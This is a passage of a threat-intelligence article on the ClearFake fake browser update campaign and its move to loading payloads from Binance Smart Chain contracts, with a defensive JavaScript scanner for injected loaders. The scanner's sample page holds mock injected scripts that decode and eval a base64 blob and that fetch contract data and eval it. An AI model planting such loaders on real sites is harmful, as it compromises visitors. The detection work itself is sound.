- As part of the tactic, victims' web traffic is first routed through the Keitaro TDS filtering service, which then redirects them to fake browser update pages.
- The fake update pages look realistic and copy the download pages for Chrome, Edge, and Microsoft.
- Once the victim clicks the update button, the page downloads payloads hosted on Dropbox and OneDrive.
Notably, SocGholish operators used the same technique successfully in 2022, which suggests that the same threat group may be behind the new ClearFake malware.
Change in code injection method
In late September, ClearFake changed its code injection tactics. Previously, the injected code was a base64-encoded script added to the HTML of the compromised webpages; most recently, the injected loader has been observed retrieving its payload from smart contracts on Binance Smart Chain instead of carrying it in the page.
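The two injection styles above differ in what a defender can see in the page source: the older one carries a long base64 blob that is decoded and executed inline, the newer one carries only a small loader that asks a blockchain RPC endpoint for the payload. The following heuristic scanner is an added example written for this article, not code from the ClearFake operators or from any vendor report. The Binance Smart Chain RPC hostnames (`bsc-dataseed*.binance.org` / `bnbchain.org`) and the `eth_call` JSON-RPC method are assumptions about how such a loader reads a contract, and the sample HTML is constructed; the contract address and base64 blob in it are filler, not indicators.

```javascript
// Added example (not from the original article): heuristic scan of inline
// <script> bodies for the two ClearFake injection styles described above.
// The RPC hostnames and JSON-RPC method are assumed, not taken from the page.

const BASE64_BLOB = /[A-Za-z0-9+\/]{200,}={0,2}/;               // long base64-looking run
const BASE64_DECODE = /\batob\s*\(/;                             // client-side decode
const EVAL_LIKE = /\b(?:eval|Function|setTimeout)\s*\(/;         // turns text into code
const BSC_RPC = /bsc-dataseed\d*\.(?:binance|bnbchain)\.org/i;   // assumed BSC RPC hosts
const ETH_CALL = /["']eth_call["']/;                             // read-only contract call

// Pull every non-empty inline <script> body out of an HTML document.
function extractInlineScripts(html) {
  const scripts = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (m[1].trim().length > 0) scripts.push(m[1]);
  }
  return scripts;
}

// Classify one script body; returns the reasons it looks like an injected loader.
function classifyScript(body) {
  const reasons = [];
  if (BASE64_BLOB.test(body) && BASE64_DECODE.test(body) && EVAL_LIKE.test(body)) {
    reasons.push('base64-encoded payload decoded and executed inline');
  }
  if (BSC_RPC.test(body) && ETH_CALL.test(body) && EVAL_LIKE.test(body)) {
    reasons.push('payload fetched from a BSC smart contract and executed');
  }
  return reasons;
}

// Scan a whole page; returns one finding per suspicious inline script,
// with the script's position among the page's inline scripts.
function scanHtml(html) {
  return extractInlineScripts(html)
    .map((body, index) => ({ index, reasons: classifyScript(body) }))
    .filter((f) => f.reasons.length > 0);
}

// Constructed sample page (not a real compromised site). Script 0 is benign,
// script 1 mimics the earlier base64 injection, script 2 mimics the
// contract-based loader. The blob and the zero address are placeholders.
const SAMPLE_HTML = `
<html><body>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>eval(atob("${'QUJD'.repeat(60)}"));</script>
<script>
  fetch("https://bsc-dataseed1.binance.org/", {
    method: "POST",
    body: JSON.stringify({ jsonrpc: "2.0", id: 1, method: "eth_call",
      params: [{ to: "0x0000000000000000000000000000000000000000", data: "0x" }, "latest"] })
  }).then(r => r.json()).then(j => eval(decodeHex(j.result)));
</script>
</body></html>`;

// Run the scanner over the constructed page.
function demo() {
  return scanHtml(SAMPLE_HTML);
}

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Requiring all three signals (blob, decode, execute; or RPC host, `eth_call`, execute) keeps the scanner from flagging ordinary analytics snippets or legitimate dApp front-ends that talk to BSC without executing what they fetch. A real deployment would run this over a crawl of the site's pages and diff the findings against a known-good copy of the theme, since the injected script typically sits in a template that is rendered on every page.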
A glance at the fake browser update landscape
- Another campaign is associated with the SocGholish malware, which has been in use for over five years to deliver AsyncRAT and NetSupport RAT, among other payloads.
- Furthermore, a FakeSG campaign was used to drop NetSupport RAT onto victims' systems.
- One more cluster of fake update campaigns was observed in June with the emergence of SmartApeSG, which likewise downloaded NetSupport RAT onto compromised systems.
The bottom line
As fake browser updates remain a viable method for malware delivery, organizations need to actively monitor their endpoints and networks to block such threats. The IOCs associated with the campaign have been made available to help defenders understand the attackers' infrastructure, attack pattern, and activities.